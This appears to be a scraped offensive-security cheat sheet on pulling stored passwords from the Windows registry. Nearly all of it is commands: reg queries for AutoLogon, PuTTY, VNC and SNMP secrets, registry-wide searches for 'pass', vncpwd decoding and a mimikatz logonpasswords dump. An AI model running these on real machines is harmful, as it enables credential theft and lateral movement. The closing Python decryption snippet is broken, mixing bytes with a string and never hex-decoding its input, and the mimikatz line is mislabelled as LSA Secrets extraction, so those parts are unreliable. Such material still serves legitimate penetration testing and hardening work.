Password in Registry
1. AutoLogon Credentials
Registry Path:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\WinlogonCommands to Query:
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUsernamereg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPasswordreg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogonAutoAdminLogon = 1means auto-logon is enabled.if
DefaultPasswordis missing, it might be stored in LSA Secrets instead.
2. PuTTY Stored Session
PuTTY saves proxy credentials in the registry.
Registry Path
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SessionsCommands To Query
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\centos7 -v ProxyUsernamereg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\centos7 -v ProxyPasswordPasswords might be encoded (Base64) but not encrypted. Decode with powershell.
[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("<string>"))3. TightVNC Stored Password
TightVNC passwords are stored in the registry, often encoded using weak XOR-Based encryption
Registry Path
HKEY_CURRENT_USER\Software\TightVNC\ServerCommands To Query
reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v Passwordreg query HKEY_CURRENT_USER\Software\TightVNC\Server /v PasswordViewOnlyuse
vncpwd.exeto decode VNC passowrds:
C:\Users\Desktop\Tools\vncpwd\vncpwd.exe [Encrypted Password]4. VNC Credentials (Encrypted)
ReaalVNC and WinVNC store credentials in the registry
Registry Path
WinVNC3
HKEY_CURRENT_USER\Software\ORL\WinVNC3\PasswordRealVNC
HKEY_CURRENT_USER\Software\RealVNC\WinVNC4 /v passwordCommand to Query:
reg query "HKCU\Software\ORL\WinVNC3" /v passwordreg query "HKLM\Software\RealVNC\WinVNC4" /v passworduse
vncpwd.exeto decode VNC passowrds:
vncpwd.exe [Encrypted Password]5. SNMP Community Strings
Registry Path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMPCommands to Query
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP6. Searching for Passwords in Registry
Search Entire Registry for "password" (Local Machine):
reg query "HKEY_LOCAL_MACHINE" /s | findstr /i "pass*"Search Entire Registry for "password" (Current User):
reg query "HKEY_CURRENT_USER" /s | findstr /i "pass*"7. Fault Tolerant Heap (FTH) Rules
FTHstored compatibility fixes for the application, which sometimes include sensitive info
Registry Path:
HKEY_LOCAL_MACHINE\Software\Microsoft\FTHCommand to Query:
reg query "HKLM\Software\Microsoft\FTH" /V RuleListPro Tips:
Extract LSA Secrets( if passwords are missing):
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exitExtract VNC Passwords from Registry (Directly):
(Get-ItemProperty -Path 'HKCU\Software\ORL\WinVNC3').PasswordDecrypt TightVNC Password
import base64
key = 'tightvnc'
enc = b'PASSWORD_HEX'
dec = bytes([a ^ b for a, b in zip(enc, key * (len(enc) // len(key) + 1))])
print(dec.decode('utf-8'))Last updated